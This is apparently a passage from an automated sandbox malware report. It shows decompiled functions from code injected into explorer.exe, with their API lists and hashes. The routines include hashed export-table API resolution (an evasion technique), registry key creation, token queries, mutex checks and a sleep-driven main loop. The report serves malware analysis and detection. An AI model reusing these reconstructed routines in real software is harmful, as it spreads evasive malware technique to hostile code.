                  • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BEE1
                  • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF0E
                  • RegCloseKey.KERNEL32(?,?,00000002), ref: 0008BF2E
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: QueryValue$CloseOpen
                  • String ID:
                  • API String ID: 1586453840-0
                  • Opcode ID: ddc077ba024ef068cbd919a8e6084d299da2af67421786a4409f78ee1ec57403
                  • Instruction ID: a503bc69bf056dc60d578d60e72969ac8cbe77b2aa393cc8f9a4dd6054926014
                  • Opcode Fuzzy Hash: ddc077ba024ef068cbd919a8e6084d299da2af67421786a4409f78ee1ec57403
                  • Instruction Fuzzy Hash: 0921A4B5A00148BF9B61DFA9DC44DAEBBF8FF98740B1141A9B945E7211D7309E00DB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00085631, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97sleepsynchronizationCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 78%
                  			E00085631(void* __edx, void* __edi) {
				char _v44;
				void* _t8;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t20;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t40;
				void* _t49;
				void* _t54;

				_t54 = __edi;
				_t8 = E00089E66(0x3b); // executed
				if(_t8 != 0xffffffff) {
					L2:
					E0008980C(0x9e6c8);
					_t39 = 0x37; // executed
					E00089F06(_t39);
					_t11 =  *0x9e688; // 0xb0000
					_t40 = 0x3a; // executed
					E00089F06(_t40); // executed
					E0008E4C1(_t63);
					_t14 =  *0x9e688; // 0xb0000
					_t41 =  &_v44;
					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
					E0008A86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
					_t17 =  *0x9e684; // 0xe7f8f0
					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x9e6c8,  *0x9e6cc);
					 *0x9e74c = _t18;
					if(_t18 != 0) {
						_t20 = CreateMutexA(0, 0, 0);
						 *0x9e76c = _t20;
						__eflags = _t20;
						if(_t20 != 0) {
							_t34 = E00088604(0x1000);
							_t52 = 0;
							 *0x9e770 = _t34;
							_t49 =  *0x9e774; // 0x2
							__eflags = _t34;
							_t41 =  !=  ? 0 : _t49;
							__eflags = _t41;
							 *0x9e774 = _t41; // executed
						}
						E0008153B(_t41, _t52); // executed
						E000898EE(E00082EDA, 0, __eflags, 0, 0); // executed
						E00083017(); // executed
						E000831C2(0, __eflags); // executed
						E000829B1(); // executed
						E00083BB2(_t54, __eflags); // executed
						while(1) {
							__eflags =  *0x9e758; // 0x0
							if(__eflags != 0) {
								break;
							}
							E0008980C(0x9e750);
							_push(0x9e750);
							_push(0x9e750); // executed
							E0008279B();
							Sleep(0xfa0);
						}
						E00083D34();
						E00089A8E();
						E000834CB();
						_t33 = 0;
						__eflags = 0;
					} else {
						goto L3;
					}
				} else {
					_t36 = E00082DCB();
					_t63 = _t36;
					if(_t36 != 0) {
						L3:
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

















                  0x00085631
                  0x0008563d
                  0x00085646
                  0x00085651
                  0x00085656
                  0x00085669
                  0x0008566a
                  0x0008566f
                  0x0008567f
                  0x00085680
                  0x00085688
                  0x0008568d
                  0x00085692
                  0x0008569c
                  0x0008569f
                  0x000856a9
                  0x000856b1
                  0x000856b7
                  0x000856be
                  0x000856d0
                  0x000856d6
                  0x000856db
                  0x000856dd
                  0x000856e4
                  0x000856e9
                  0x000856eb
                  0x000856f1
                  0x000856f7
                  0x000856f9
                  0x000856f9
                  0x000856fc
                  0x000856fc
                  0x00085702
                  0x00085710
                  0x00085717
                  0x0008571c
                  0x00085721
                  0x00085726
                  0x00085750
                  0x00085750
                  0x00085756
                  0x00000000
                  0x00000000
                  0x00085732
                  0x00085737
                  0x00085738
                  0x00085739
                  0x0008574a
                  0x0008574a
                  0x00085758
                  0x0008575d
                  0x00085762
                  0x00085767
                  0x00085767
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00085648
                  0x00085648
                  0x0008564d
                  0x0008564f
                  0x000856c0
                  0x000856c2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008564f
                  0x0008576d

                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000856D0
                    • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                    • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                  • Sleep.KERNELBASE(00000FA0), ref: 0008574A
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: mNa
                  • API String ID: 3249252070-3942756900
                  • Opcode ID: fd4bb5a668434b88d5c04a99dfde256102c0f641a73eee2e9a85173188a96518
                  • Instruction ID: 618d9e32d6944c2961c1c58ef027407fe41e2fb87ac27e57644674ab890b217f
                  • Opcode Fuzzy Hash: fd4bb5a668434b88d5c04a99dfde256102c0f641a73eee2e9a85173188a96518
                  • Instruction Fuzzy Hash: 0031D6312056509BF724FBB5EC069EA3B99FF557A0B144126F5C9861A3EE349900C763
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 522 8dfad-8dfc4 523 8e021 522->523 524 8dfc6-8dfee 522->524 526 8e023-8e027 523->526 524->523 525 8dff0-8e013 call 8c379 call 8d400 524->525 531 8e028-8e03f 525->531 532 8e015-8e01f 525->532 533 8e041-8e049 531->533 534 8e095-8e097 531->534 532->523 532->525 533->534 535 8e04b 533->535 534->526 536 8e04d-8e053 535->536 537 8e063-8e074 536->537 538 8e055-8e057 536->538 540 8e079-8e085 LoadLibraryA 537->540 541 8e076-8e077 537->541 538->537 539 8e059-8e061 538->539 539->536 539->537 540->523 542 8e087-8e091 GetProcAddress 540->542 541->540 542->523 543 8e093 542->543 543->526
                  C-Code - Quality: 100%
                  			E0008DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                  0x0008dfb6
                  0x0008dfb8
                  0x0008dfbb
                  0x0008dfbe
                  0x0008dfc4
                  0x0008e021
                  0x00000000
                  0x0008e021
                  0x0008dfc6
                  0x0008dfd1
                  0x0008dfd4
                  0x0008dfd9
                  0x0008dfde
                  0x0008dfe1
                  0x0008dfe3
                  0x0008dfe6
                  0x0008dfe9
                  0x0008dfee
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008dff0
                  0x0008dff0
                  0x0008e002
                  0x0008e00f
                  0x0008e013
                  0x00000000
                  0x00000000
                  0x0008e015
                  0x0008e018
                  0x0008e019
                  0x0008e01f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008e01f
                  0x0008e036
                  0x0008e03b
                  0x0008e03f
                  0x00000000
                  0x0008e04b
                  0x0008e04b
                  0x0008e04d
                  0x0008e04d
                  0x0008e053
                  0x00000000
                  0x00000000
                  0x0008e059
                  0x0008e05d
                  0x0008e061
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008e061
                  0x0008e067
                  0x0008e06f
                  0x0008e074
                  0x0008e077
                  0x0008e077
                  0x0008e079
                  0x0008e07d
                  0x0008e085
                  0x00000000
                  0x00000000
                  0x0008e089
                  0x0008e091
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008e091

                  APIs
                  • LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
                  • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: .dll
                  • API String ID: 2574300362-2738580789
                  • Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                  • Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
                  • Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                  • Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00089B43, Relevance: 4.8, APIs: 3, Instructions: 254COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 544 89b43-89b75 call 88604 547 89b7e-89b9e call 8b5f6 544->547 548 89b77-89b79 544->548 552 89ba0 547->552 553 89ba3-89bb8 call 895c7 547->553 549 89e1a-89e1e 548->549 552->553 556 89cee-89cfb 553->556 557 89bbe-89bd6 553->557 558 89d3c-89d4c call 89292 556->558 559 89cfd-89d1e 556->559 562 89ceb 557->562 563 89bdc-89bf8 557->563 566 89d4f-89d51 558->566 567 89d20-89d3a call 89292 559->567 568 89d54-89d74 call 885c2 RegOpenKeyExA 559->568 562->556 563->568 573 89bfe-89c18 call 89292 563->573 566->568 567->566 575 89dc8-89dcd 568->575 576 89d76-89d8b RegCreateKeyA 568->576 579 89d8d-89db2 call 8861a memset call 8861a 573->579 585 89c1e-89c36 573->585 581 89dcf 575->581 582 89dd5 575->582 578 89dba-89dbf 576->578 576->579 586 89dc1 578->586 587 89dc3-89dc6 578->587 579->578 581->582 583 89dd8-89df4 call 8c379 582->583 598 89e0b-89e18 call 8861a 583->598 599 89df6-89e09 583->599 594 89c38-89c7c call 895e1 call 892e5 call 885d5 call 89256 585->594 595 89cab-89cb0 585->595 586->587 587->583 616 89c8b-89ca9 call 8861a * 2 594->616 617 89c7e-89c83 594->617 601 89cb6-89ce9 call 89292 call 8861a 595->601 598->549 599->598 599->599 601->568 616->601 617->616 618 89c85 617->618 618->616
                  C-Code - Quality: 89%
                  			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				void* _t91;
				char* _t92;
				long _t96;
				int* _t97;
				intOrPtr _t98;
				int* _t101;
				long _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E00088604(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E000895C7(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E00089292(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0x9e68c; // 0xe7fab8
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E00089292(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0x9e688; // 0xb0000
						_t128 =  *0x9e68c; // 0xe7fab8
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0x9e68c; // 0xe7fab8
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E000885C2( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								_t98 =  *0x9e68c; // 0xe7fab8
								 *((intOrPtr*)(_t98 + 0x1c))();
								_t155[0x43] = _v8;
								_t101 = E0008C379(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E0008861A( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E0008861A( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E0008861A( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E00089292(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0x9e68c; // 0xe7fab8
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0x9e68c; // 0xe7fab8
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E000895E1( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E000892E5(_v32);
							_v32 = _t179;
							E000885D5( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E00089256(_v12);
							_v24 = _t147;
							_t148 =  *0x9e68c; // 0xe7fab8
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E0008861A( &_v32, 0xfffffffe);
							E0008861A( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E00089292(_v12);
						_t171 =  *0x9e684; // 0xe7f8f0
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E0008861A( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}



















































                  0x00089b4c
                  0x00089b4e
                  0x00089b51
                  0x00089b53
                  0x00089b5b
                  0x00089b5e
                  0x00089b65
                  0x00089b6d
                  0x00089b6f
                  0x00089b75
                  0x00089b7e
                  0x00089b86
                  0x00089b8c
                  0x00089b93
                  0x00089b99
                  0x00089b9b
                  0x00089b9e
                  0x00089ba0
                  0x00089ba0
                  0x00089ba0
                  0x00089ba8
                  0x00089bab
                  0x00089bb0
                  0x00089bb3
                  0x00089bb6
                  0x00089bb8
                  0x00089cee
                  0x00089cee
                  0x00089cf4
                  0x00089cfb
                  0x00089d3c
                  0x00089d40
                  0x00089d41
                  0x00089d47
                  0x00089d4c
                  0x00089d4f
                  0x00089d4f
                  0x00089d51
                  0x00000000
                  0x00089d51
                  0x00089d00
                  0x00089d0a
                  0x00089d13
                  0x00089d18
                  0x00089d1b
                  0x00089d1e
                  0x00000000
                  0x00000000
                  0x00089d20
                  0x00089d24
                  0x00089d25
                  0x00089d2a
                  0x00089d2b
                  0x00089d2e
                  0x00089d32
                  0x00089d37
                  0x00000000
                  0x00089bbe
                  0x00089bbe
                  0x00089bcb
                  0x00089bd1
                  0x00089bd4
                  0x00089bd6
                  0x00089ceb
                  0x00000000
                  0x00089ceb
                  0x00089bdf
                  0x00089be3
                  0x00089beb
                  0x00089bf2
                  0x00089bf5
                  0x00089bf8
                  0x00089d54
                  0x00089d57
                  0x00089d6f
                  0x00089d72
                  0x00089d74
                  0x00089dc8
                  0x00089dcb
                  0x00089dcd
                  0x00089dcf
                  0x00089dcf
                  0x00089dd5
                  0x00089dd8
                  0x00089dd8
                  0x00089ddd
                  0x00089de4
                  0x00089dea
                  0x00089def
                  0x00089df2
                  0x00089df4
                  0x00089e0b
                  0x00089e11
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00089df6
                  0x00089df6
                  0x00089e02
                  0x00089e06
                  0x00089e07
                  0x00089e07
                  0x00000000
                  0x00089df6
                  0x00089d79
                  0x00089d86
                  0x00089d89
                  0x00089d8b
                  0x00089dba
                  0x00089dbd
                  0x00089dbf
                  0x00089dc1
                  0x00089dc1
                  0x00089dc3
                  0x00000000
                  0x00089dc3
                  0x00089d8d
                  0x00089d96
                  0x00089da2
                  0x00089dad
                  0x00000000
                  0x00089db2
                  0x00089bfe
                  0x00089bff
                  0x00089c02
                  0x00089c07
                  0x00089c0b
                  0x00089c10
                  0x00089c13
                  0x00089c16
                  0x00089c18
                  0x00000000
                  0x00000000
                  0x00089c29
                  0x00089c31
                  0x00089c34
                  0x00089c36
                  0x00089cab
                  0x00089cb3
                  0x00089c38
                  0x00089c3a
                  0x00089c49
                  0x00089c51
                  0x00089c57
                  0x00089c5a
                  0x00089c62
                  0x00089c65
                  0x00089c6f
                  0x00089c72
                  0x00089c77
                  0x00089c7a
                  0x00089c7c
                  0x00089c7e
                  0x00089c81
                  0x00089c83
                  0x00089c85
                  0x00089c85
                  0x00089c83
                  0x00089c91
                  0x00089c9c
                  0x00089ca1
                  0x00089ca4
                  0x00089ca4
                  0x00089cc3
                  0x00089cc8
                  0x00089cce
                  0x00089cd1
                  0x00089cd3
                  0x00089cd9
                  0x00089ce2
                  0x00000000
                  0x00089ce8
                  0x00089bb8
                  0x00089b77
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: d3ee57014509ae2ff040b6b3c1fdc026683ba4ce783e510bd8cf0a7ce7d76e45
                  • Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
                  • Opcode Fuzzy Hash: d3ee57014509ae2ff040b6b3c1fdc026683ba4ce783e510bd8cf0a7ce7d76e45
                  • Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008B998, Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E00088604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E0008861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                  0x0008b99b
                  0x0008b99c
                  0x0008b9a3
                  0x0008b9ab
                  0x0008b9af
                  0x0008b9b8
                  0x0008b9fe
                  0x0008b9fe
                  0x0008b9c5
                  0x0008b9cd
                  0x0008b9cf
                  0x0008b9d5
                  0x0008b9ee
                  0x00000000
                  0x0008b9f0
                  0x0008b9f5
                  0x00000000
                  0x0008b9fb
                  0x0008b9d7
                  0x0008b9d7
                  0x0008b9d7
                  0x0008b9d7
                  0x0008b9d5
                  0x0008ba04

                  APIs
                  • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
                  • GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: InformationToken$AllocateErrorHeapLast
                  • String ID:
                  • API String ID: 2499131667-0
                  • Opcode ID: 30974beac8b2856b26893e7e6f2f40e01bd49064f9cad794b75fd758cf646baa
                  • Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
                  • Opcode Fuzzy Hash: 30974beac8b2856b26893e7e6f2f40e01bd49064f9cad794b75fd758cf646baa
                  • Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008590C, Relevance: 4.5, APIs: 3, Instructions: 44synchronizationCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0x9e684; // 0xe7f8f0
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}








                  0x00085910
                  0x00085915
                  0x00085921
                  0x0008592e
                  0x00085932
                  0x0008594a
                  0x0008596a
                  0x0008596b
                  0x0008595a
                  0x0008595a
                  0x00085960
                  0x00085960
                  0x00085934
                  0x00085934
                  0x0008593a
                  0x0008593a
                  0x00085917
                  0x00085917
                  0x00085917
                  0x00085973

                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
                  • GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateErrorLastMutex
                  • String ID:
                  • API String ID: 1925916568-0
                  • Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                  • Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
                  • Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                  • Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A471, Relevance: 4.5, APIs: 3, Instructions: 30synchronizationCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008A471(CHAR* __ecx, void* __edx) {
				intOrPtr _t8;
				void* _t16;
				void* _t17;

				_t16 = __edx; // executed
				_t17 = CreateMutexA(0, 1, __ecx);
				if(_t17 != 0) {
					if(GetLastError() == 0xb7 && E0008A4BF(_t17, _t16) < 0) {
						_t8 =  *0x9e684; // 0xe7f8f0
						 *((intOrPtr*)(_t8 + 0x30))(_t17);
						_t17 = 0;
					}
					return _t17;
				}
				GetLastError();
				return 0;
			}






                  0x0008a47d
                  0x0008a485
                  0x0008a489
                  0x0008a4a0
                  0x0008a4af
                  0x0008a4b5
                  0x0008a4b8
                  0x0008a4b8
                  0x00000000
                  0x0008a4ba
                  0x0008a48b
                  0x00000000

                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00084E14,00000000), ref: 0008A47F
                  • GetLastError.KERNEL32 ref: 0008A48B
